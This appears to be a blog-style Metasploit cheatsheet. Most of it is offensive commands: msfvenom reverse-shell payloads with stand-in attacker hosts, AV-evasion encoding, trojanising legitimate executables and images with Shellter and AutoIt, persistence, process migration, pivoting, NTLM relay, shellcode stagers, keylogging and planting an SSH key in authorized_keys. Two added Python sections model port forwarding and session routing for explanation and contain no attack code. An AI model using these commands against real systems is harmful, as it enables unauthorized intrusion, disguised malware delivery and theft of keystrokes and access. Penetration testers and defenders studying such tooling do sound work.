
Metasploit Commands Cheatsheet


Basic Metasploit Commands 

msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=attacker_Ip -f exe -e x86/shikata_ga_nai -i 3 -b '\x00\xff' > /root/Desktop/encoded.exe

shellter --> Shellter is a dynamic shellcode injection tool; it injects shellcode into
native Windows applications.

download any program to bind our payload to
download and open Shellter in Windows
select "A"
select "N"
drag in the program to which our payload is to be bound

select "stealth mode" y
L
1
set attacker_ip
set port 8080
--------------------------------

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set lport 8080
MAINTAINING PERSISTENT CONNECTION

#get into a meterpreter connection first

background
use exploit/windows/local/persistence
show options
set EXE_NAME service1
set DELAY 10
sessions -l           # list sessions
set session 3
show advanced
set EXE::CUSTOM /root/Desktop/malw.exe
show options 
run    # payload successfully injected into target machine

sessions 3

meterpreter>
Process Migration 

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set RHOST
set LHOST
set LPORT

run

meterpreter > ps               # list all running processes
meterpreter > migrate ANY_PID
meterpreter > migrate 255
Binding a Payload to a Legitimate Executable (Meterpreter)

msfvenom -p windows/shell_reverse_tcp LHOST=KALI_IP LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -x plink.exe -o payload_plink.exe

# Meterpreter list active port forwards
portfwd list 

# Forward local 3389 (RDP) to 3389 on target-host, reached via the compromised machine running the Meterpreter shell
portfwd add -l 3389 -p 3389 -r target-host 
portfwd add -l 88 -p 88 -r 127.0.0.1
portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445

# Remove the 3389 forward again
portfwd delete -l 3389 -p 3389 -r target-host 
# Meterpreter delete all port forwards
portfwd flush 
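To make the portfwd mechanics concrete, here is an added example (not code from the page or from Metasploit) of what a `portfwd add -L <bind> -l <local_port> -r <remote_host> -p <remote_port>` entry does: a local listener that relays each accepted connection to the remote host and port. The assumption that differs from the real thing is that both ends are ordinary sockets on one machine, whereas in Meterpreter the remote side of the relay is opened by the compromised host. The "internal service" is a constructed echo server standing in for something like RDP on 3389. For a defender, the relevant consequence is visible in the model: every forwarded connection appears on the network as a new outbound connection from the compromised host to the internal service, which is the place to look for it.

```python
import socket
import threading


def _pipe(src, dst):
    """Copy bytes src -> dst until src reaches EOF, then half-close dst
    so the other direction of the relay can finish cleanly."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


class PortForward:
    """Local TCP listener relaying each connection to remote_host:remote_port.

    Mirrors 'portfwd add -L <bind> -l <local_port> -r <remote_host> -p <remote_port>'.
    Assumption: in Meterpreter the remote leg is opened by the compromised host;
    here both legs are plain sockets on this machine (enough to show the mechanics).
    """

    def __init__(self, remote_host, remote_port, bind_addr="127.0.0.1", local_port=0):
        self.remote = (remote_host, remote_port)
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.listener.bind((bind_addr, local_port))   # local_port 0 = OS picks a free port
        self.listener.listen(5)
        self.local_port = self.listener.getsockname()[1]
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self):
        while True:
            try:
                client, _ = self.listener.accept()
            except OSError:          # listener closed by delete()
                return
            try:
                upstream = socket.create_connection(self.remote, timeout=5)
            except OSError:          # internal service unreachable: drop the client
                client.close()
                continue
            upstream.settimeout(None)
            threading.Thread(target=_pipe, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pipe, args=(upstream, client), daemon=True).start()

    def delete(self):
        """Equivalent of 'portfwd delete': stop accepting new connections."""
        self.listener.close()


def start_echo_server():
    """Constructed stand-in for the internal service: echoes one connection,
    then exits. Returns the port it listens on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def relay_roundtrip(message=b"hello through portfwd"):
    """Send 'message' through the forward and return what the service echoed back."""
    service_port = start_echo_server()
    fwd = PortForward("127.0.0.1", service_port)
    received = b""
    with socket.create_connection(("127.0.0.1", fwd.local_port), timeout=5) as s:
        s.sendall(message)
        s.shutdown(socket.SHUT_WR)   # done sending; now drain the echoed reply
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            received += chunk
    fwd.delete()
    return received


if __name__ == "__main__":
    print(relay_roundtrip())
```

The half-close handling in `_pipe` is the part that is easy to get wrong in a relay: closing the whole socket as soon as one direction hits EOF would cut off a reply still in flight, so each direction only shuts down its write side.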

or, instead of forwarding single ports, route a whole subnet through the session:

# Use Meterpreter's autoroute script to add the route for the specified subnet 192.168.15.0/24
run autoroute -s 192.168.15.0/24 
use auxiliary/server/socks4a

# Meterpreter list all active routes
run autoroute -p 

# Meterpreter view available networks the compromised host can access
route
# Meterpreter add route for 192.168.14.0/24 via Session number.
route add 192.168.14.0 255.255.255.0 3 
# Meterpreter delete route for 192.168.14.0/24 via Session number.
route delete 192.168.14.0 255.255.255.0 3 
# Meterpreter delete all routes
route flush 
Normal Shell to Meterpreter
#list the sessions
sessions -l
use post/multi/manage/shell_to_meterpreter
set SESSION 1 
run 

or 

sessions -l
#upgrade the normal shell (session 1) to a Meterpreter session
sessions -u 1
#interact with the new Meterpreter session (2 = the session number)
sessions 2
Metasploit One Liner

msfconsole -x "use exploit/unix/smtp/qmail_bash_env_exec;set payload cmd/unix/reverse;set LPORT 8080;set RPORT 25;set RHOST 10.10.10.10;set mailto 'admin@testqmail2.test';run;"
Pivoting

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 10.14.14.6
run
background
sessions -l
use post/multi/manage/autoroute
set SUBNET 192.168.125.0
set SESSION 1
run
use auxiliary/server/socks_proxy
set SRVPORT 1060
run
use auxiliary/server/socks5 
set SRVPORT 1090

#on Attacker Machine
sudo nano /etc/proxychains.conf
socks5 127.0.0.1 1090
Pivoting - Autoroute method

meterpreter> background

# Add Route
run autoroute -s 192.168.125.0/24

#View Route
run autoroute -p

background

use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.125.88
set THREADS 5
run

use auxiliary/server/socks4a
info
jobs -l
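The `route add 192.168.14.0 255.255.255.0 3` form above and the `run autoroute -s 192.168.125.0/24` / `post/multi/manage/autoroute` form in the two Pivoting sections populate the same framework-internal table: a subnet mapped to the session whose host can reach it. The following is an added example, not Metasploit's own code, modelling that table in Python with the standard `ipaddress` module so the lookup rules are visible: a destination that matches no entry is contacted directly from the attacker's box, a destination that matches an entry is contacted from the compromised host over that session, and (an assumption here, as in ordinary IP routing) the most specific entry wins when entries overlap. The practical consequence for detection is the same one the table encodes: every scan or connection to a routed subnet is sourced from the pivot host, not from the attacker.

```python
import ipaddress


class SessionRouteTable:
    """Model of the table shown by 'route' and 'run autoroute -p'.

    Each entry says: traffic for this subnet is sent through the Meterpreter
    session with this id, so it leaves from the compromised host rather than
    from the attacker's own interface.
    """

    def __init__(self):
        self.routes = []  # list of (ipaddress.IPv4Network, session_id)

    @staticmethod
    def _network(subnet, netmask=None):
        # Accept both forms used on the page: a separate dotted netmask
        # ('route add 192.168.14.0 255.255.255.0 3') and CIDR ('-s 192.168.125.0/24').
        spec = subnet if netmask is None else f"{subnet}/{netmask}"
        return ipaddress.ip_network(spec, strict=False)

    def add(self, subnet, session_id, netmask=None):
        net = self._network(subnet, netmask)
        if (net, session_id) not in self.routes:
            self.routes.append((net, session_id))
        return net

    def delete(self, subnet, session_id, netmask=None):
        """Return True if a matching route existed and was removed."""
        net = self._network(subnet, netmask)
        before = len(self.routes)
        self.routes = [r for r in self.routes if r != (net, session_id)]
        return len(self.routes) < before

    def flush(self):
        self.routes.clear()

    def lookup(self, host):
        """Session id that traffic for 'host' is pivoted through, or None for direct."""
        addr = ipaddress.ip_address(host)
        matches = [(net, sid) for net, sid in self.routes if addr in net]
        if not matches:
            return None
        # Assumption: most specific prefix wins, as in normal IP routing.
        _, sid = max(matches, key=lambda r: r[0].prefixlen)
        return sid

    def dump(self):
        """Rows in the column order of the 'route' listing: Subnet, Netmask, Gateway."""
        return [(str(n.network_address), str(n.netmask), f"Session {sid}")
                for n, sid in self.routes]


def demo():
    """Replay the page's route commands against the model and collect the lookups."""
    table = SessionRouteTable()
    table.add("192.168.14.0", 3, "255.255.255.0")   # route add 192.168.14.0 255.255.255.0 3
    table.add("192.168.125.0/24", 1)                # run autoroute -s 192.168.125.0/24
    table.add("192.168.125.88/32", 2)               # constructed host route via a second session
    result = {
        "scan_target": table.lookup("192.168.125.88"),  # /32 beats /24 -> session 2
        "subnet_host": table.lookup("192.168.125.10"),  # /24 route -> session 1
        "rdp_host": table.lookup("192.168.14.25"),      # -> session 3
        "direct": table.lookup("10.10.10.10"),          # no route -> None (direct)
        "deleted": table.delete("192.168.14.0", 3, "255.255.255.0"),
    }
    result["after_delete"] = table.lookup("192.168.14.25")  # None once the route is gone
    table.flush()                                           # route flush
    result["after_flush"] = len(table.dump())
    return result


if __name__ == "__main__":
    print(demo())
```

`demo()` returns `{'scan_target': 2, 'subnet_host': 1, 'rdp_host': 3, 'direct': None, 'deleted': True, 'after_delete': None, 'after_flush': 0}`. Note that `strict=False` is what lets a host address such as `192.168.125.88/24` be accepted the way the CLI would accept it; with the default `strict=True` the `ipaddress` module rejects a network whose host bits are set.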

Setting up proxy on meterpreter

use post/windows/manage/portproxy
set CONNECT_ADDRESS 10.10.10.12
set CONNECT_PORT 80
set LOCAL_ADDRESS 10.10.10.11
set LOCAL_PORT 80
set session 1
run
Setting up Relay Server 

use auxiliary/server/http_ntlmrelay
set RHOST 10.10.10.11
set RURIPATH /admin/admin.php
set URIPATH /
set SRVHOST 10.10.10.12
set SRVPORT 80
run 
Passing session to Metasploit

msf5 exploit(multi/handler) > use exploit/multi/handler
msf5 exploit(multi/handler) > setg payload windows/x64/meterpreter/reverse_https
msf5 exploit(multi/handler) > setg lhost 10.10.10.12
msf5 exploit(multi/handler) > setg lport 8001
msf5 exploit(multi/handler) > setg exitfunc thread
msf5 exploit(multi/handler) > setg exitonsession false
msf5 exploit(multi/handler) > run -j


#generating a Stager
use payload/windows/x64/meterpreter/reverse_http
generate -f raw -u /tmp/shellcode.bin
xxd -ps /tmp/shellcode.bin | tr -d "\n"

#copy the shellcode; it can be run on the target machine, which returns a reverse shell to Metasploit. This can be done easily via Covenant:
#go to your Grunt --> Task --> ShellCode --> paste the hex data and execute the task. You should see a reverse shell on Metasploit.
BINDING A PAYLOAD TO AN IMAGE

#download and open AutoIt
#open the script that you have, replace the URL with the actual image URL
#browse to the script in AutoIt
#set it to exe
tick --> x64
select an icon, download it and browse to it -->
use this to convert an image to an icon -->  https://image.online-convert.com/convert-to-ico

now bind it with a payload using shellter
create a payload

msfconsole
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp

--> run the exploit on the target machine ..

 

=======================================  

Meterpreter Commands
======================================

#list the process
Meterpreter> ps

#Migrate the process to explorer for better connection
migrate PID

#start capturing keystrokes
keyscan_start

#dump keystrokes

keyscan_dump

#Send a keystroke
meterpreter > keyboard_send "cd /root/.ssh"

#Send "Enter" key
meterpreter > keyevent 13 press

#Send a keystroke
meterpreter > keyboard_send "echo ssh-rsa <PUBLIC_KEY_REMOVED> Bhanu@HackingDream > authorized_keys"
[*] Done

#Send "Enter" key
meterpreter > keyevent 13 press

#Take Screenshot

meterpreter > screenshot
Screenshot saved to: /home/Bhanu//FabUVLRz.jpeg
